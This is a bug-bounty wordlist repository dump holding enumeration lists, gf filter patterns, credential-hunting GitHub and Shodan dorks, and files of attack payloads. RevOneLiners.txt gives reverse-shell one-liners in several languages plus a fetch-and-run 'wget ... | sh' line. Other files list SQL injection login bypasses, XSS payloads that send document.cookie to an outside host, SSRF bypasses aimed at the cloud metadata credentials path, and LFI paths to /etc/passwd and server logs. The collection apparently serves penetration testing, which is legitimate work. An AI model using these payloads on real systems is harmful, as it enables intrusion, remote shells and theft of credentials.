├── Passwords.txt
├── Subdomains.txt
├── Attacks
    ├── SpaceReplace.txt
    ├── Authorisation
    │   ├── prefix.txt
    │   ├── suffix.txt
    │   ├── Headers.txt
    │   └── 403-bypass.txt
    ├── LFI
    │   ├── Windows
    │   │   ├── Tester.txt
    │   │   └── Interesting-Files.txt
    │   ├── params.txt
    │   ├── Linux
    │   │   ├── Tester.txt
    │   │   ├── Injection-Test.txt
    │   │   └── Interesting-Files.txt
    │   └── Traversal.txt
    ├── Open-Redirect
    │   ├── Dorks.txt
    │   ├── JS-APIs.txt
    │   ├── One-liners.txt
    │   ├── Filter-bypass.txt
    │   └── Interesting-url-params.txt
    ├── SSRF
    │   ├── URL-Schemas.txt
    │   ├── Whitelist-bypass.txt
    │   └── Blacklist-bypass.txt
    ├── Authentication
    │   ├── Email-payloads.txt
    │   └── SQLi bypass.txt
    ├── Command-Injection
    │   ├── Common-Vuln-Params.txt
    │   └── CommandInjection.txt
    ├── SQLi
    │   ├── Common-Vuln-Params.txt
    │   └── SQLi-Discovery.txt
    ├── XSS
    │   ├── Filter-Test.txt
    │   └── Payloads.txt
    ├── RevOneLiners.txt
    ├── XXE
    │   ├── Payloads.txt
    │   └── localDTD.txt
    └── CommandInjection.txt
├── Directories.txt
├── gf-json-filters
    ├── SSTI.txt
    ├── subdomains.txt
    ├── IDOR.txt
    ├── SQLi.json
    ├── rce.json
    ├── LFI.json
    ├── SSRF.json
    ├── OpenRedirect.json
    └── xss.json
├── README.md
├── Enum
    ├── ShodanDorks.txt
    └── Githubdorks.txt
└── Extensions.txt


/Passwords.txt:
--------------------------------------------------------------------------------
1 | password
2 | 


--------------------------------------------------------------------------------
/Subdomains.txt:
--------------------------------------------------------------------------------
1 | blog
2 | dev
3 | 


--------------------------------------------------------------------------------
/Attacks/SpaceReplace.txt:
--------------------------------------------------------------------------------
1 | \t
2 | \n
3 | +
4 | %20
5 | ${IFS}
6 | 


--------------------------------------------------------------------------------
/Directories.txt:
--------------------------------------------------------------------------------
1 | .git
2 | admin
3 | dev
4 | code
5 | login
6 | 


--------------------------------------------------------------------------------
/Attacks/Authorisation/prefix.txt:
--------------------------------------------------------------------------------
1 | /
2 | //
3 | /./
4 | /%2e/
5 | /%20
6 | 


--------------------------------------------------------------------------------
/Attacks/LFI/Windows/Tester.txt:
--------------------------------------------------------------------------------
1 | C:\boot.ini
2 | C:\WINDOWS\win.ini
3 | 


--------------------------------------------------------------------------------
/Attacks/Open-Redirect/Dorks.txt:
--------------------------------------------------------------------------------
1 | site:{target} inurl:%2f
2 | site:{target} inurl:%3f
3 | site:{target} inurl:%3a
4 | 


--------------------------------------------------------------------------------
/Attacks/Authorisation/suffix.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | /
 3 | /.
 4 | //
 5 | /./
 6 | %20/
 7 | %20/page
 8 | /*
 9 | /%2f/
10 | ./.
11 | /*/
12 | 


--------------------------------------------------------------------------------
/Attacks/SSRF/URL-Schemas.txt:
--------------------------------------------------------------------------------
 1 | http://
 2 | https://
 3 | file:///
 4 | dict://
 5 | ftp://
 6 | gopher://
 7 | sftp://
 8 | ldap://
 9 | tftp://
10 | 


--------------------------------------------------------------------------------
/Attacks/Open-Redirect/JS-APIs.txt:
--------------------------------------------------------------------------------
1 | document.location
2 | document.URL
3 | document.open()
4 | window.location.href
5 | window.navigate()
6 | window.open()
7 | 


--------------------------------------------------------------------------------
/Attacks/Authorisation/Headers.txt:
--------------------------------------------------------------------------------
 1 | X-Forwarded-For:
 2 | X-Forwarded-By:
 3 | X-Forwarded:
 4 | X-Forwarded-For-Original:
 5 | X-Forwarder-For:
 6 | Forwarded:
 7 | Forwarded-For:
 8 | Forwarded-For-Ip:
 9 | Referer:
10 | 


--------------------------------------------------------------------------------
/gf-json-filters/SSTI.txt:
--------------------------------------------------------------------------------
 1 | {
 2 | "flags": "-iE",
 3 | "patterns": [
 4 | 
 5 | "template=",
 6 | "preview=",
 7 | "id=",
 8 | "view=",
 9 | "activity=",
10 | "name=",
11 | "content=",
12 | "redirect="
13 | ]
14 | }
15 | 


--------------------------------------------------------------------------------
/Attacks/Authentication/Email-payloads.txt:
--------------------------------------------------------------------------------
1 | #replace {payload} with SQLi, XSS or RCE etc
2 | 
3 | "{payload}"@domain.com
4 | name@"{payload}"domain.com
5 | name({payload})@domain.com
6 | name@({payload})@domain.com
7 | name@domain.com({payload})
8 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Wordlists
2 | A repository of wordlists for enumeration. 
3 | 
4 | Contains json files to run with gf to fins common params vulnerable to exploits
5 | wordlists for common bug bounty vunerabilities
6 | other useful wordlists for infosec and bug bounty
7 | 


--------------------------------------------------------------------------------
/gf-json-filters/subdomains.txt:
--------------------------------------------------------------------------------
 1 | {
 2 |     "flags": "-iE",
 3 |      "patterns": [
 4 | "admin",
 5 | "jenkins",
 6 | "test",
 7 | "proxy",
 8 | "stage",
 9 | "test",
10 | "dev",
11 | "devops",
12 | "staff",
13 | "db",
14 | "qa",
15 | "internal"
16 | ]
17 | }
18 | 


--------------------------------------------------------------------------------
/Attacks/Authorisation/403-bypass.txt:
--------------------------------------------------------------------------------
 1 | /{file}
 2 | /{file}/
 3 | /{file}/.
 4 | //{file}//
 5 | /./{file}/./
 6 | /%2e/{file}
 7 | /{file}%20/
 8 | /%20{file}%20/
 9 | /{file}%20/page
10 | # change protocol from to http to https or vice versa
11 | # change request method, eg GET to POST
12 | 


--------------------------------------------------------------------------------
/gf-json-filters/IDOR.txt:
--------------------------------------------------------------------------------
 1 | {
 2 |     "flags": "-iE",
 3 |      "patterns": [
 4 | 
 5 |  "id=",
 6 |  "user=",
 7 |  "account=",
 8 |  "number=",
 9 |  "order=",
10 |  "no=",
11 |  "doc=",
12 |  "key=",
13 |  "email=",
14 |  "group=",
15 |  "profile=",
16 |  "edit=",
17 |  "report="
18 |  
19 |  ]
20 | }
21 | 


--------------------------------------------------------------------------------
/Attacks/LFI/params.txt:
--------------------------------------------------------------------------------
 1 | cat=
 2 | dir=
 3 | board=
 4 | date=
 5 | lang=
 6 | detail=
 7 | file=
 8 | download=
 9 | path=
10 | folder=
11 | prefix=
12 | include=
13 | page=
14 | inc=
15 | locate=
16 | show=
17 | doc=
18 | site=
19 | type=
20 | view=
21 | content=
22 | document=
23 | layout=
24 | mod=
25 | conf=
26 | 


--------------------------------------------------------------------------------
/Enum/ShodanDorks.txt:
--------------------------------------------------------------------------------
 1 | #replace {org} with target organisation name
 2 | 
 3 | "default password" org:{org}
 4 | "230 login successful" port:21 org:{org}
 5 | vsftpd 2.3.4 port:21 org:{org}
 6 | 230 'anonymous@' login ok org:{org}
 7 | guest login ok org:{org}
 8 | port:21 -530 +230 +{org}
 9 | port:80 title:protected org:{org}
10 | 


--------------------------------------------------------------------------------
/Attacks/Command-Injection/Common-Vuln-Params.txt:
--------------------------------------------------------------------------------
 1 | cmd=
 2 | exec=
 3 | command=
 4 | ping=
 5 | execute=
 6 | query=
 7 | jump=
 8 | code=
 9 | reg=
10 | do=
11 | func=
12 | arg=
13 | option=
14 | load=
15 | process=
16 | step=
17 | read=
18 | function=
19 | req=
20 | feature=
21 | exe=
22 | module=
23 | payload=
24 | run=
25 | print=
26 | 


--------------------------------------------------------------------------------
/Enum/Githubdorks.txt:
--------------------------------------------------------------------------------
 1 | #replace {target} with target domain name
 2 | "{target}" send_keys
 3 | "{target}" password
 4 | "{target}" api_key
 5 | "{target}" apikey
 6 | "{target}" jira_password
 7 | "{target}" root password
 8 | "{target}" access_token
 9 | "{target}" config
10 | "{target}" client_secret
11 | "{target}" user auth
12 | "{target}" pwd=
13 | 


--------------------------------------------------------------------------------
/Attacks/Open-Redirect/One-liners.txt:
--------------------------------------------------------------------------------
1 |  ~/go/bin/gau https://{target} -s  | head -n 5000 > ~/Projects/BugBounty/Targets/redirecturls.txt; cat ~/Projects/BugBounty/Targets/redirecturls.txt | sort -u | grep -a -i \=http | tee ~/Projects/BugBounty/Targets/{target}_redirects.txt
2 | 
3 | python paramspider.py --domain {target} | tee ~/Project/BugBounty/Targets/{target}.txt ; ~/go/bin/gf redirect {target}.txt
4 | 
5 | 
6 | 
7 | 
8 | 


--------------------------------------------------------------------------------
/Attacks/LFI/Linux/Tester.txt:
--------------------------------------------------------------------------------
 1 | etc/passwd
 2 | etc/passwd%00
 3 | etc%2fpasswd
 4 | etc%2fpasswd%00
 5 | etc%5cpasswd
 6 | etc%5cpasswd%00
 7 | etc%c0%afpasswd
 8 | etc%c0%afpasswd%00
 9 | etc/passwd%2500
10 | file:///etc/passwd
11 | php://filter/resource=/etc/passwd
12 | php://input&cmd=ls
13 | expect://ls
14 | php://filter/convert.base64-encode/resource=/etc/passwd
15 | etc/passwd…………………………………………………………………………….
16 | etc/passwd/../../../../../../../../../../../../../../../../../..
17 | 


--------------------------------------------------------------------------------
/gf-json-filters/SQLi.json:
--------------------------------------------------------------------------------
 1 | {
 2 | 
 3 |      "flags" : "-HanrE",
 4 |     "patterns" : [
 5 |     "id=",
 6 |     "page=",
 7 |     "dir=",
 8 |     "search=",
 9 |     "category=",
10 |     "class=",
11 |     "file=",
12 |     "url=",
13 |     "news=",
14 |     "item=",
15 |     "menu=",
16 |     "lang=",
17 |     "name=",
18 |     "ref=",
19 |     "title=",
20 |     "view=",
21 |     "topic=",
22 |     "thread=",
23 |     "type=",
24 |     "date=",
25 |     "form=",
26 |     "join=",
27 |     "main=",
28 |     "nav=",
29 |     "region="
30 |     ]
31 | }
32 | 


--------------------------------------------------------------------------------
/gf-json-filters/rce.json:
--------------------------------------------------------------------------------
 1 | {
 2 | 
 3 |      "flags" : "-HanrE",
 4 |     "patterns" : [
 5 |     "cmd=",
 6 |     "exec=",
 7 |     "command=",
 8 |     "ping=",
 9 |     "execute=",
10 |     "query=",
11 |     "jump=",
12 |     "code=",
13 |     "reg=",
14 |     "do=",
15 |     "func=",
16 |     "arg=",
17 |     "option=",
18 |     "load=",
19 |     "process=",
20 |     "step=",
21 |     "read=",
22 |     "function=",
23 |     "req=",
24 |     "feature=",
25 |     "exe=",
26 |     "module=",
27 |     "payload=",
28 |     "run=",
29 |     "print="
30 |     ]
31 | }
32 | 


--------------------------------------------------------------------------------
/gf-json-filters/LFI.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "flags" : "-HanrE",
 3 |     "patterns" : [
 4 |     "cat=",
 5 |     "dir=",
 6 |     "action=",
 7 |     "board=",
 8 |     "date=",
 9 |     "detail=",
10 |     "file=",
11 |     "download=",
12 |     "path=",
13 |     "folder=",
14 |     "prefix=",
15 |     "include=",
16 |     "page=",
17 |     "inc=",
18 |     "locate=",
19 |     "show=",
20 |     "doc=",
21 |     "site=",
22 |     "type=",
23 |     "view=",
24 |     "content=",
25 |     "document=",
26 |     "layout=",
27 |     "mod=",
28 |     "conf=",
29 |     ".txt"
30 |     ]
31 | }
32 | 


--------------------------------------------------------------------------------
/gf-json-filters/SSRF.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "flags" : "-HanrE",
 3 |     "patterns" : [
 4 |     "dest=",
 5 |     "redirect=",
 6 |     "uri=",
 7 |     "path=",
 8 |     "continue=",
 9 |     "url=",
10 |     "window=",
11 |     "next=",
12 |     "data=",
13 |     "reference=",
14 |     "site=",
15 |     "html=",
16 |     "val=",
17 |     "validate=",
18 |     "domain=",
19 |     "callback=",
20 |     "return=",
21 |     "page=",
22 |     "feed=",
23 |     "host=",
24 |     "port=",
25 |     "to=",
26 |     "out=",
27 |     "view=",
28 |     "dir=",
29 |     "=http"
30 |     ]
31 | }
32 | 


--------------------------------------------------------------------------------
/gf-json-filters/OpenRedirect.json:
--------------------------------------------------------------------------------
 1 | {
 2 | 
 3 |     "flags" : "-HanrE",
 4 |     "patterns" : [
 5 |     "url=",
 6 |     "from_url=",
 7 |     "load_url=",
 8 |     "file_url=",
 9 |     "page_url=",
10 |     "file_name=",
11 |     "page=",
12 |     "folder=",
13 |     "folder_url=",
14 |     "login_url=",
15 |     "img_url=",
16 |     "return_url=",
17 |     "return_to=",
18 |     "next=",
19 |     "redirect=",
20 |     "redirect_to=",
21 |     "logout=",
22 |     "checkout=",
23 |     "checkout_url=",
24 |     "goto=",
25 |     "next_page=",
26 |     "file=",
27 |     "load_file=",
28 |     "=http"
29 |     ]
30 | }
31 | 


--------------------------------------------------------------------------------
/Attacks/SQLi/Common-Vuln-Params.txt:
--------------------------------------------------------------------------------
 1 | ?id=
 2 | ?page=
 3 | ?dir=
 4 | ?search=
 5 | ?category=
 6 | ?class=
 7 | ?file=
 8 | ?url=
 9 | ?news=
10 | ?item=
11 | ?menu=
12 | ?lang=
13 | ?name=
14 | ?ref=
15 | ?title=
16 | ?view=
17 | ?topic=
18 | ?thread=
19 | ?type=
20 | ?date=
21 | ?form=
22 | ?join=
23 | ?main=
24 | ?nav=
25 | ?region=
26 | &id=
27 | &page=
28 | &dir=
29 | &search=
30 | &category=
31 | &class=
32 | &file=
33 | &url=
34 | &news=
35 | &item=
36 | &menu=
37 | &lang=
38 | &name=
39 | &ref=
40 | &title=
41 | &view=
42 | &topic=
43 | &thread=
44 | &type=
45 | &date=
46 | &form=
47 | &join=
48 | &main=
49 | &nav=
50 | &region=
51 | 


--------------------------------------------------------------------------------
/Attacks/XSS/Filter-Test.txt:
--------------------------------------------------------------------------------
 1 | 221b20221b20<
 2 | 221b20221b20"
 3 | 221b20221b20">
 4 | 221b20221b20<>
 5 | 221b20221b20<script>
 6 | 221b20221b20<scrIpt>
 7 | 221b20221b20<script>alert
 8 | 221b20221b20<scipt>alErt
 9 | 221b20221b20<script>alert(
10 | 221b20221b20<script>alert()
11 | 221b20221b20<script>alert()<
12 | 221b20221b20<script>alert()</
13 | 221b20221b20<script>alert()</script>
14 | 221b20221b20javascipt
15 | 221b20221b20jaVaScript
16 | 221b20221b20javascipt:
17 | 221b20221b20jaVaScript:
18 | 221b20221b20jaVaScript:alert
19 | 221b20221b20jaVaScript:alert()
20 | 221b20221b20alert
21 | 221b20221b20-alert()
22 | <a href=#>221b20221b20</a>
23 | 


--------------------------------------------------------------------------------
/Attacks/SSRF/Whitelist-bypass.txt:
--------------------------------------------------------------------------------
 1 | http://{domain}@127.0.0.1
 2 | http://127.0.0.1#{domain}
 3 | http://{domain}.127.0.0.1
 4 | http://127.0.0.1/{domain}
 5 | http://127.0.0.1/?d={domain}
 6 | https://{domain}@127.0.0.1
 7 | https://127.0.0.1#{domain}
 8 | https://{domain}.127.0.0.1
 9 | https://127.0.0.1/{domain}
10 | https://127.0.0.1/?d={domain}
11 | http://{domain}@localhost
12 | http://localhost#{domain}
13 | http://{domain}.localhost
14 | http://localhost/{domain}
15 | http://localhost/?d={domain}
16 | http://127.0.0.1%00{domain}
17 | http://127.0.0.1?{domain}
18 | http://127.0.0.1///{domain}
19 | https://127.0.0.1%00{domain}
20 | https://127.0.0.1?{domain}
21 | https://127.0.0.1///{domain}
22 | 


--------------------------------------------------------------------------------
/Attacks/SSRF/Blacklist-bypass.txt:
--------------------------------------------------------------------------------
 1 | 127.0.0.1
 2 | 127.1
 3 | 127.000.000.1
 4 | localhost
 5 | 127.0.0.2
 6 | 0x7f.0x0.0x0.0x1
 7 | 0177.0.0.01
 8 | 01111111000000000000000000000001
 9 | 01111111.00000000.00000000.00000001
10 | 2130706433
11 | %6c%6f%63%61%6c%68%6f%73%74
12 | 0177.0.0.0x1
13 | 169.254.169.254
14 | 169.254.169.254/latest/meta-data/iam/security-credentials/
15 | 169.254.169.254/latest/meta-data/hostname
16 | fuf.me
17 | localtest.me
18 | ulh.us
19 | 127-0-0-1.org.uk
20 | ratchetlocal.com
21 | smackaho.st
22 | 42foo.com
23 | vcap.me
24 | beweb.com
25 | yoogle.com
26 | ortkut.com
27 | feacebook.com
28 | lvh.me
29 | 127.127.127.127
30 | 127.0.0.0
31 | 0
32 | 1.1.1.1 &@2.2.2.2# @3.3.3.3
33 | urllib: 3.3.3.3
34 | [::]:80
35 | [::]:443
36 | 0000::1:80
37 | 


--------------------------------------------------------------------------------
/gf-json-filters/xss.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "flags" : "-HanrE",
 3 |     "patterns" : [
 4 |     "callback=",
 5 |     "jsonp=",
 6 |     "api_key=",
 7 |     "api=",
 8 |     "password=",
 9 |     "email=",
10 |     "emailto=",
11 |     "token=",
12 |     "username=",
13 |     "csrf_token=",
14 |     "unsubscribe_token=",
15 |     "p=",
16 |     "q=",
17 |     "query=",
18 |     "search=",
19 |     "id=",
20 |     "item=",
21 |     "page_id=",
22 |     "s=",
23 |     "lang=",
24 |     "keywords=",
25 |     "page=",
26 |     "year=",
27 |     "view=",
28 |     "email=",
29 |     "type=",
30 |     "name=",
31 |     "month=",
32 |     "immagine=",
33 |     "list_type=",
34 |     "url=",
35 |     "terms",
36 |     "categoryid=",
37 |     "key=",
38 |     "l=",
39 |     "begindate=",
40 |     "enddate="
41 |     ]
42 | }
43 | 


--------------------------------------------------------------------------------
/Attacks/XSS/Payloads.txt:
--------------------------------------------------------------------------------
 1 | javascript://%e2%80%a8alert(document.cookie);
 2 | a=8,b=confirm,c=window,c.onerror=b;throw-a
 3 | <svg onload=alert(6)>
 4 | "><svg onload=alert(6)//
 5 | "onmouseover=alert(6)//
 6 | "autofocus/onfocus=alert(6)//
 7 | '-alert(6)-'
 8 | '-alert(6)//
 9 | \'-alert(6)//
10 | </script><svg onload=alert(6)>
11 | <svg+onload=alert%26%230000000040"")>&#=%26%230000000040=(
12 | ;<sc%00ript>alert/**/(1)</script>
13 | alert/**/(1)//
14 | ;<sc%00ript/test='asdf'>alert/**/(1)</script>
15 | ;<sc%00ript/test='asdf'/te%00st2='asdf'>alert/**/(1)</script>
16 | ;</script><embed/test=''/allowscr%00iptaccess='always'/s%00rc='//test.test/xss2.swf'//>&id=9978655
17 | ,alert(0),
18 | ,document.location='javascript:document.domain',
19 | ,window.location='http:'%2bdocument.domain%2b'.my-burp-domain',
20 | confirm(document?.cookie)
21 | confirm(this[`document`][`cookie`])
22 | fetch(`https://canarytoken.com/path/?p=`%252bbtoa(document?.cookie))
23 | 


--------------------------------------------------------------------------------
/Attacks/RevOneLiners.txt:
--------------------------------------------------------------------------------
 1 | bash -i >& /dev/tcp/{IP}/{PORT} 0>&1
 2 | bash -c 'bash -i >& /dev/tcp/{IP}/{PORT} 0>&1'
 3 | perl -e 'use Socket;$i="{IP}";$p={PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 4 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
 5 | php -r '$sock=fsockopen("{IP}",{PORT});exec("/bin/sh -i <&3 >&3 2>&3");'
 6 | ruby -rsocket -e'f=TCPSocket.open("{IP}",{PORT}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 7 | nc -e /bin/sh {IP} {PORT}
 8 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP} {PORT} >/tmp/f
 9 | rm -f /tmp/p; mknod /tmp/p p && telnet {IP} {PORT} 0/tmp/p
10 | wget http://{IP}:{PORT}/rev.sh -O- | sh
11 | 


--------------------------------------------------------------------------------
/Attacks/Authentication/SQLi bypass.txt:
--------------------------------------------------------------------------------
 1 | or 1=1
 2 | or 1=1--
 3 | or 1=1#
 4 | or 1=1/*
 5 | admin' --
 6 | admin' #
 7 | admin'/*
 8 | admin' or '1'='1
 9 | admin' or '1'='1'--
10 | admin' or '1'='1'#
11 | admin' or '1'='1'/*
12 | admin'or 1=1 or ''='
13 | admin' or 1=1
14 | admin' or 1=1--
15 | admin' or 1=1#
16 | admin' or 1=1/*
17 | admin') or ('1'='1
18 | admin') or ('1'='1'--
19 | admin') or ('1'='1'#
20 | admin') or ('1'='1'/*
21 | admin') or '1'='1
22 | admin') or '1'='1'--
23 | admin') or '1'='1'#
24 | admin') or '1'='1'/*
25 | 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
26 | admin" --
27 | admin" #
28 | admin"/*
29 | admin" or "1"="1
30 | admin" or "1"="1"--
31 | admin" or "1"="1"#
32 | admin" or "1"="1"/*
33 | admin"or 1=1 or ""="
34 | admin" or 1=1
35 | admin" or 1=1--
36 | admin" or 1=1#
37 | admin" or 1=1/*
38 | admin") or ("1"="1
39 | admin") or ("1"="1"--
40 | admin") or ("1"="1"#
41 | admin") or ("1"="1"/*
42 | admin") or "1"="1
43 | admin") or "1"="1"--
44 | admin") or "1"="1"#
45 | admin") or "1"="1"/*
46 | 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
47 | admin; --
48 | admin" ; --
49 | admin;--
50 | 


--------------------------------------------------------------------------------
/Attacks/SQLi/SQLi-Discovery.txt:
--------------------------------------------------------------------------------
 1 | '
 2 | ''
 3 | "
 4 | ;
 5 | --
 6 | ;--
 7 | .1
 8 | 1234+OR+123=123
 9 | 1234+OR+432=123
10 | 1234+AND+1234=1234
11 | 1234+AND+123=1234
12 | OR+""=""
13 | '--
14 | "--
15 | %27
16 | %22
17 | %u0027
18 | %u0022
19 | [1]
20 | 1`
21 | 1\
22 | 1/*'*/
23 | 1/*!1111'*/
24 | 1'||'asd'||'
25 | 1' or'1'='1
26 | 1 or 1=1
27 | 'or"='
28 | [1]
29 | 1`
30 | \
31 | /*'*/
32 | /*!1111'*/
33 | '||'asd'||'
34 | ' or'1'='1
35 | 1 or 1=1
36 | 'or"='
37 | '++--+-
38 | '+OR+'1'='1
39 | ' OR 1=1#
40 | ' OR 1=1 /*
41 | ') OR 1=1 --
42 | ' OR '1' = '1
43 | +OR+1=1--
44 | ' --
45 | ' #
46 | ';#
47 | ' or 1=1;#
48 | ' '/*
49 | ' or 1=1--
50 | ' or 1=1#
51 | ') or '1'='1--
52 | ') or ('1'='1--
53 | ' or 1=1 LIMIT 1;#
54 | SELECT
55 | 'SELECT
56 | UNION
57 | ,(select * from (select(sleep(10)))a)
58 | %2c(select%20*%20from%20(select(sleep(10)))a)
59 | ';WAITFOR DELAY '0:0:30'--
60 | OR 1=1
61 | OR 1=1#
62 | OR x=y#
63 | OR 1=1--
64 | OR x=x--
65 | OR 3409=3409 AND ('pytW' LIKE 'pytW
66 | HAVING 1=1
67 | HAVING 1=1#
68 | HAVING 1=0--
69 | AND 1=1--
70 | AND 1=1 AND '%'='
71 | WHERE 1=1 AND 1=0--
72 | %' AND 8310=8310 AND '%'='
73 | ' or ''-'
74 | ' or '' '
75 | ' or ''&'
76 | ' or ''^'
77 | ' or ''*'
78 | or true--
79 | " or true--
80 | ' or true--
81 | ") or true--
82 | ') or true--
83 | admin') or ('1'='1'--
84 | admin') or ('1'='1'#
85 | admin') or ('1'='1'/
86 | 


--------------------------------------------------------------------------------
/Attacks/Open-Redirect/Filter-bypass.txt:
--------------------------------------------------------------------------------
 1 | http://canarytokens.com/traffic/tags/{TOKEN}/contact.php
 2 | HtTp://canarytokens.com/traffic/tags/{TOKEN}/contact.php
 3 | %00http://canarytokens.com/traffic/tags/{TOKEN}/contact.php
 4 |  http://canarytokens.com/traffic/tags/{TOKEN}/contact.php
 5 | //canarytokens.com/traffic/tags/{TOKEN}/contact.php
 6 | %68%74%74%70%3a%2f%2fcanarytokens.com/traffic/tags/{TOKEN}/contact.php
 7 | %2568%2574%2574%2570%253a%252f%252fcanarytokens.com/traffic/tags/{TOKEN}/contact.php
 8 | https://canarytokens.com/traffic/tags/{TOKEN}/contact.php
 9 | http:\\canarytokens.com/traffic/tags/{TOKEN}/contact.php
10 | http:///canarytokens.com/traffic/tags/{TOKEN}/contact.php
11 | http://canarytokens.com/traffic/tags/{TOKEN}/contact.php
12 | @canarytokens.com/traffic/tags/{TOKEN}/contact.php
13 | //%0d%0ahttp://canarytokens.com/traffic/tags/{TOKEN}/contact.php
14 | ftp://canarytokens.com/traffic/tags/{TOKEN}/contact.php
15 | http://canarytokens。com/traffic/tags/{TOKEN}/contact.php
16 | /%0d/canarytokens.com/traffic/tags/{TOKEN}/contact.php
17 | http://canarytokens.com/traffic/tags/{TOKEN}/contact.php%EF%BC%http://{target}
18 | http://canarytokens.com/traffic/tags/{TOKEN}/contact.php/?-foobar
19 | http://Ⓒanarytokens.com/traffic/tags/{TOKEN}/contact.php
20 | %01http://canarytokens.com/traffic/tags/{TOKEN}/contact.php
21 | ////%09/canarytokens.com/traffic/tags/{TOKEN}/contact.php
22 | 


--------------------------------------------------------------------------------
/Attacks/LFI/Linux/Injection-Test.txt:
--------------------------------------------------------------------------------
 1 | /etc/passwd
 2 | /apache/logs/access.log
 3 | /apache/logs/error.log
 4 | /apache2/logs/error.log
 5 | /apache2/logs/access.log
 6 | /etc/httpd/logs/access.log
 7 | /etc/httpd/logs/access_log
 8 | /etc/httpd/logs/error_log
 9 | /etc/httpd/logs/error.log
10 | /logs/error.log
11 | /logs/access.log
12 | /logs/error_log
13 | /logs/access_log
14 | /usr/local/apache/logs/access_log
15 | /usr/local/apache/logs/access.log
16 | /usr/local/apache/logs/error_log
17 | /usr/local/apache/logs/error.log
18 | /usr/local/apache2/logs/access_log
19 | /usr/local/apache2/logs/access.log
20 | /usr/local/apache2/logs/error_log
21 | /usr/local/apache2/logs/error.log
22 | /var/log/access_log
23 | /var/log/access.log
24 | /var/log/error_log
25 | /var/log/error.log
26 | /var/log/apache/access_log
27 | /var/log/apache/error.log
28 | /var/log/apache2/access_log
29 | /var/log/apache2/error.log
30 | /var/log/httpd/access_log
31 | /var/log/httpd/error_log
32 | /var/log/httpd/access_log
33 | /var/log/httpd/error_log
34 | /var/www/logs/error_log
35 | /var/www/logs/error.log
36 | /var/www/logs/access_log
37 | /var/www/logs/access.log
38 | /var/www/mgr/logs/error_log
39 | /var/www/mgr/logs/error.log
40 | /var/www/mgr/logs/access_log
41 | /var/www/mgr/logs/access.log
42 | /opt/lampp/logs/access_log
43 | /opt/lampp/logs/access.log
44 | /opt/lampp/logs/error_log
45 | /opt/lampp/logs/error.log
46 | /opt/xampp/logs/access_log
47 | /opt/xampp/logs/access.log
48 | /opt/xampp/logs/error_log
49 | /opt/xampp/logs/error.log
50 | 


--------------------------------------------------------------------------------
/Extensions.txt:
--------------------------------------------------------------------------------
  1 | 7z
  2 | a
  3 | apk
  4 | ar
  5 | bz2
  6 | cab
  7 | cpio
  8 | deb
  9 | dmg
 10 | egg
 11 | gz
 12 | iso
 13 | jar
 14 | lha
 15 | mar
 16 | pea
 17 | rar
 18 | rpm
 19 | s7z
 20 | shar
 21 | tar
 22 | tbz2
 23 | tgz
 24 | tlz
 25 | war
 26 | whl
 27 | xpi
 28 | zip
 29 | zipx
 30 | xz
 31 | pak
 32 | aac
 33 | aiff
 34 | ape
 35 | au
 36 | flac
 37 | gsm
 38 | it
 39 | m3u
 40 | m4a
 41 | mid
 42 | mod
 43 | mp3
 44 | mpa
 45 | pls
 46 | ra
 47 | s3m
 48 | sid
 49 | wav
 50 | wma
 51 | xm
 52 | mobi
 53 | epub
 54 | azw1
 55 | azw3
 56 | azw4
 57 | azw6
 58 | azw
 59 | cbr
 60 | cbz
 61 | c
 62 | cc
 63 | class
 64 | clj
 65 | cpp
 66 | cs
 67 | cxx
 68 | el
 69 | go
 70 | h
 71 | java
 72 | lua
 73 | m
 74 | m4
 75 | php
 76 | pl
 77 | po
 78 | py
 79 | rb
 80 | rs
 81 | sh
 82 | swift
 83 | vb
 84 | vcxproj
 85 | xcodeproj
 86 | xml
 87 | diff
 88 | patch
 89 | html
 90 | js
 91 | exe
 92 | msi
 93 | bin
 94 | command
 95 | sh
 96 | bat
 97 | crx
 98 | eot
 99 | otf
100 | ttf
101 | woff
102 | woff2
103 | 3dm
104 | 3ds
105 | max
106 | bmp
107 | dds
108 | gif
109 | jpg
110 | jpeg
111 | png
112 | psd
113 | xcf
114 | tga
115 | thm
116 | tif
117 | tiff
118 | yuv
119 | ai
120 | eps
121 | ps
122 | svg
123 | dwg
124 | dxf
125 | gpx
126 | kml
127 | kmz
128 | webp
129 | ods
130 | xls
131 | xlsx
132 | csv
133 | ics
134 | vcf
135 | ppt
136 | odp
137 | doc
138 | docx
139 | ebook
140 | log
141 | md
142 | msg
143 | odt
144 | org
145 | pages
146 | pdf
147 | rtf
148 | rst
149 | tex
150 | txt
151 | wpd
152 | wps
153 | 3g2
154 | 3gp
155 | aaf
156 | asf
157 | avchd
158 | avi
159 | drc
160 | flv
161 | m2v
162 | m4p
163 | m4v
164 | mkv
165 | mng
166 | mov
167 | mp2
168 | mp4
169 | mpe
170 | mpeg
171 | mpg
172 | mpv
173 | mxf
174 | nsv
175 | ogg
176 | ogv
177 | ogm
178 | qt
179 | rm
180 | rmvb
181 | roq
182 | srt
183 | svi
184 | vob
185 | webm
186 | wmv
187 | yuv
188 | html
189 | htm
190 | css
191 | js
192 | jsx
193 | less
194 | scss
195 | wasm
196 | php
197 | asp
198 | aspx
199 | config
200 | bak
201 | old
202 | php5
203 | phtml
204 | php7
205 | png.php
206 | php.png
207 | json
208 | 


--------------------------------------------------------------------------------
/Attacks/LFI/Windows/Interesting-Files.txt:
--------------------------------------------------------------------------------
 1 | php://input
 2 | C:\boot.ini
 3 | C:\WINDOWS\win.ini
 4 | C:\WINDOWS\php.ini
 5 | C:\WINNT\php.ini
